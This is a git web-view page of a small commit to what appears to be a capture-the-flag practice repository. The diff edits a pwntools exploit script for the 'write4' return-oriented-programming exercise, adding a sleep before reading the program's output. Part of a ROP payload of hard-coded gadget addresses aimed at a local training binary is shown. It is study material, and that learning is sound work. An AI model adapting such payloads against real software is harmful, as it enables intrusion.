summaryrefslogtreecommitdiff
path: root/x86_64/write4/exploit.py
diff options
context:
space:
mode:
authorBrett Weiland <brett_weiland@bpcspace.com>2020-12-16 21:33:39 -0600
committerBrett Weiland <brett_weiland@bpcspace.com>2020-12-16 21:33:39 -0600
commit3f54969f581fd311c09b1c21758ad9aa4a8784f4 (patch)
tree355475d185371a41f66154649b3526367069a52c /x86_64/write4/exploit.py
parent3f0a1e64c7e7b410ad5f4e2024cd692536389449 (diff)
new file: x86_64/badchars/exploit.py
new file: x86_64/badchars/exploit_dirty.py new file: x86_64/badchars/usefullstuff deleted: x86_64/write4/.exploit.py.swp deleted: x86_64/write4/.useful_gadgets.swp modified: x86_64/write4/exploit.py
Diffstat (limited to 'x86_64/write4/exploit.py')
-rwxr-xr-xx86_64/write4/exploit.py2
1 files changed, 2 insertions, 0 deletions
diff --git a/x86_64/write4/exploit.py b/x86_64/write4/exploit.py
index f8b294e..026687f 100755
--- a/x86_64/write4/exploit.py
+++ b/x86_64/write4/exploit.py
@@ -1,5 +1,6 @@
#!/usr/bin/env python3
from pwn import *
+from time import sleep
prog = process('./write4')
payload = b''
@@ -15,5 +16,6 @@ payload += p64(0x0000000000600df0 + 0x00000df0) # addr of init_array section
payload += p64(0x0000000000400510) # print_file@plt
payload += b"\n"
prog.sendline(payload)
+sleep(0.5)
print(str(prog.recv(), 'UTF-8'))
prog.close()